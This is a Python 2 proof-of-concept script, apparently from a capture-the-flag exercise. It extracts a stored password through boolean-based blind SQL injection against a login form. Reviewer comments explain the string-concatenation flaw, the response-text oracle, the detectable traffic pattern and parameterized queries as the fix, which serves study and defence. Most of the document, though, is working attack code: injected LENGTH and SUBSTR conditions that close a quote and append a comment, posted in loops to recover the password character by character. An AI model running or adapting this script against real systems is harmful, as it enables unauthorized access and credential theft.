Last active
February 18, 2019 11:46
Script to extract passwords
# Proof-of-concept for a boolean-based blind SQL injection in a login form.
# The host name suggests a CTF-style challenge (ecsm2016.cert.pl) - not
# confirmed from this listing. Python 2 only (print statement, xrange).
#
# NOTE(review): the listing lost its indentation on the way here; the block
# structure below is reconstructed from the statement order - confirm against
# the original before relying on it.
#
# What the script relies on, and what a defender should take from it:
#   * The crafted `password` value closes a string literal and appends its own
#     OR-condition followed by a `-- ` comment. This only works if the server
#     builds its login query by string concatenation (presumed; the server code
#     is not shown). Bound/parameterized queries remove the flaw.
#   * The response text is used as a yes/no oracle: 'Logged in successfully'
#     means the injected condition was true, 'Internal Server Error' means the
#     query broke. Exposing the 500 text makes malformed probes easy to tell
#     apart from plain failed logins.
#   * Traffic shape: up to 29 login POSTs for the length probe, then up to 94
#     per character position, all for one username and all carrying quotes,
#     `-- `, LENGTH( or SUBSTR( in the password field. That is straightforward
#     to rate-limit and to alert on.
#   * What is read back is whatever the `password` column stores; the script
#     only tests printable ASCII values.
import requests

# Account whose `password` column is being probed.
username = 'hacker'

# Phase 1: find the length of the stored value by asking
# "LENGTH(password) = N" for N = 1..29.
for password_length in range(1,30):
    password = "' or (username = '"+username+"' and LENGTH(password)="+str(password_length)+")-- "
    result = requests.post('https://secretpanel.ecsm2016.cert.pl/login', data={'username': username, 'password':password})
    if 'Logged in successfully' in result.text:
        # Injected condition evaluated true: N is the length.
        break
    elif 'Internal Server Error' in result.text:
        print 'Error in query'
        break
# NOTE(review): there is no check that a length was actually found. After an
# error, or after all 29 probes miss, password_length keeps its last value and
# phase 2 runs with it anyway.
print 'Password length: ', password_length

# Phase 2: recover the value one character at a time.
extracted = ''
password_end = "')-- "
# Zero-based count of characters recovered so far (starts at 0).
i = len(extracted)
error = False
while not error:
    if i == password_length:
        print 'Full password: ', extracted
        break
    # SUBSTR is called with i+1 as the position, i.e. one past the zero-based
    # counter.
    password_begin = "' or (username = '" +username+"' and SUBSTR(password,"+str(i+1)+",1)='"
    print 'Extracting char no. ', str(i)
    # Candidates are the printable ASCII range 0x20..0x7e.
    for c in xrange(0x20,0x7f):
        # A literal single quote would terminate the injected string early, so
        # it is skipped; a value containing one cannot be recovered this way.
        if chr(c) == "'":
            continue
        password = password_begin+chr(c)+password_end
        result = requests.post('https://secretpanel.ecsm2016.cert.pl/login', data={'username': username, 'password':password})
        if 'Logged in successfully' in result.text:
            print 'OK, the char is: ',chr(c)
            extracted = extracted + chr(c)
            print 'Whole decoded pass is: ', extracted
            i = i + 1
            break
        elif 'Internal Server Error' in result.text:
            print password
            print 'Error in query'
            error = True
            break
        else:
            pass
    # NOTE(review): with this reconstructed nesting the message is printed
    # after every pass of the inner loop, including passes that ended early on
    # a match. If no candidate matches and no error occurs, `i` does not
    # advance and the same position is probed again - confirm the intended
    # nesting of this line and of the `else` above.
    print 'Whole range done.'